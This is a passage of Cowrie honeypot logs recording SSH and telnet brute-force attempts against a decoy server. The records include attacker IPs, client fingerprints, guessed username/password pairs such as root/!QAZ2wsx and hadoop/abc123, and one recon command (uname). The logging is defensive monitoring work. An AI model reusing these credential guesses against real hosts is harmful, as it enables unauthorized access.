d25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:32:00.083228Z","src_ip":"212.227.235.229","session":"a4a3f35c2a92"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T01:32:00.446246Z","src_ip":"212.227.235.229","session":"a4a3f35c2a92"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:32:01.529775Z","src_ip":"212.227.235.229","session":"a4a3f35c2a92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32894,"dst_ip":"1.2.3.4","dst_port":22,"session":"d11bbb5204b1","protocol":"ssh","message":"New connection: 212.227.235.229:32894 (1.2.3.4:22) [session: d11bbb5204b1]","sensor":"my-vps","timestamp":"2025-08-28T01:32:01.609551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:32:01.610481Z","src_ip":"212.227.235.229","session":"d11bbb5204b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:32:01.691505Z","src_ip":"212.227.235.229","session":"d11bbb5204b1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:32:02.059348Z","src_ip":"212.227.235.229","session":"d11bbb5204b1"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:32:02.141668Z","src_ip":"212.227.235.229","session":"6067cb3abbf6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:32:02.142956Z","src_ip":"212.227.235.229","session":"d11bbb5204b1"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":52964,"dst_ip":"1.2.3.4","dst_port":22,"session":"3be8b8d5d509","protocol":"ssh","message":"New connection: 194.233.79.134:52964 (1.2.3.4:22) [session: 3be8b8d5d509]","sensor":"my-vps","timestamp":"2025-08-28T01:32:58.792008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:32:58.837329Z","src_ip":"194.233.79.134","session":"3be8b8d5d509"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:32:59.071467Z","src_ip":"194.233.79.134","session":"3be8b8d5d509"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:33:00.102047Z","src_ip":"194.233.79.134","session":"3be8b8d5d509"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:33:01.498163Z","src_ip":"194.233.79.134","session":"3be8b8d5d509"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53382,"dst_ip":"1.2.3.4","dst_port":22,"session":"78e578f24014","protocol":"ssh","message":"New connection: 217.72.205.35:53382 (1.2.3.4:22) [session: 78e578f24014]","sensor":"my-vps","timestamp":"2025-08-28T01:33:23.852889Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:33:23.854122Z","src_ip":"217.72.205.35","session":"78e578f24014"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:34:06.683547Z","src_ip":"212.227.235.229","session":"93342ae0bbe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56774,"dst_ip":"1.2.3.4","dst_port":22,"session":"b33c75245c14","protocol":"ssh","message":"New connection: 212.227.235.229:56774 (1.2.3.4:22) [session: b33c75245c14]","sensor":"my-vps","timestamp":"2025-08-28T01:34:20.870489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:34:20.871598Z","src_ip":"212.227.235.229","session":"b33c75245c14"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:34:20.976649Z","src_ip":"212.227.235.229","session":"b33c75245c14"}
{"eventid":"cowrie.login.failed","username":"airflow","password":"airflow123","message":"login attempt [airflow/airflow123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:34:21.297132Z","src_ip":"212.227.235.229","session":"b33c75245c14"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:34:22.403561Z","src_ip":"212.227.235.229","session":"b33c75245c14"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34798,"dst_ip":"1.2.3.4","dst_port":22,"session":"436b55a9ca4e","protocol":"ssh","message":"New connection: 194.233.79.134:34798 (1.2.3.4:22) [session: 436b55a9ca4e]","sensor":"my-vps","timestamp":"2025-08-28T01:34:28.505553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:34:28.966798Z","src_ip":"194.233.79.134","session":"436b55a9ca4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:34:28.967582Z","src_ip":"194.233.79.134","session":"436b55a9ca4e"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:34:30.878232Z","src_ip":"194.233.79.134","session":"436b55a9ca4e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:34:32.509057Z","src_ip":"194.233.79.134","session":"436b55a9ca4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25210,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d8c4dd5e976","protocol":"ssh","message":"New connection: 212.227.125.160:25210 (1.2.3.4:22) [session: 0d8c4dd5e976]","sensor":"my-vps","timestamp":"2025-08-28T01:35:15.614641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:35:15.615520Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:35:15.696152Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T01:35:16.118866Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc123","message":"login attempt [hadoop/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:35:17.203250Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd123","message":"login attempt [hadoop/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:35:18.285737Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd1234","message":"login attempt [hadoop/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:35:19.368584Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc1234","message":"login attempt [hadoop/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:35:20.453850Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:35:21.536793Z","src_ip":"212.227.125.160","session":"0d8c4dd5e976"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":43390,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa7d2fe58d94","protocol":"telnet","message":"New connection: 79.124.8.120:43390 (1.2.3.4:23) [session: aa7d2fe58d94]","sensor":"my-vps","timestamp":"2025-08-28T01:36:05.749824Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:36:05.790649Z","src_ip":"79.124.8.120","session":"aa7d2fe58d94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:36:05.811213Z","src_ip":"79.124.8.120","session":"aa7d2fe58d94"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56274,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b9464c99886","protocol":"ssh","message":"New connection: 194.233.79.134:56274 (1.2.3.4:22) [session: 5b9464c99886]","sensor":"my-vps","timestamp":"2025-08-28T01:36:18.554854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:36:18.725141Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:36:18.816270Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:36:20.570369Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:36:21.048640Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:36:21.049309Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:36:21.275501Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:36:21.276663Z","src_ip":"194.233.79.134","session":"5b9464c99886"}
{"eventid":"cowrie.session.connect","src_ip":"222.110.195.61","src_port":41486,"dst_ip":"1.2.3.4","dst_port":23,"session":"a1034fb27be1","protocol":"telnet","message":"New connection: 222.110.195.61:41486 (1.2.3.4:23) [session: a1034fb27be1]","sensor":"my-vps","timestamp":"2025-08-28T01:37:11.366138Z"}
{"eventid":"cowrie.session.closed","duration":31.565781593322754,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:37:42.931839Z","src_ip":"222.110.195.61","session":"a1034fb27be1"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37288,"dst_ip":"1.2.3.4","dst_port":22,"session":"e93b79fb49d7","protocol":"ssh","message":"New connection: 194.233.79.134:37288 (1.2.3.4:22) [session: e93b79fb49d7]","sensor":"my-vps","timestamp":"2025-08-28T01:38:03.262428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:38:05.888583Z","src_ip":"194.233.79.134","session":"e93b79fb49d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:38:05.889321Z","src_ip":"194.233.79.134","session":"e93b79fb49d7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T01:38:12.350924Z","src_ip":"194.233.79.134","session":"e93b79fb49d7"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:38:13.870411Z","src_ip":"194.233.79.134","session":"e93b79fb49d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:39:05.819632Z","src_ip":"79.124.8.120","session":"aa7d2fe58d94"}
{"eventid":"cowrie.session.closed","duration":180.07399821281433,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:39:05.823715Z","src_ip":"79.124.8.120","session":"aa7d2fe58d94"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37642,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1b339ba0be5","protocol":"ssh","message":"New connection: 194.233.79.134:37642 (1.2.3.4:22) [session: e1b339ba0be5]","sensor":"my-vps","timestamp":"2025-08-28T01:39:39.694994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:39:39.810374Z","src_ip":"194.233.79.134","session":"e1b339ba0be5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:39:40.667712Z","src_ip":"194.233.79.134","session":"e1b339ba0be5"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:39:41.772307Z","src_ip":"194.233.79.134","session":"e1b339ba0be5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:39:42.951420Z","src_ip":"194.233.79.134","session":"e1b339ba0be5"}
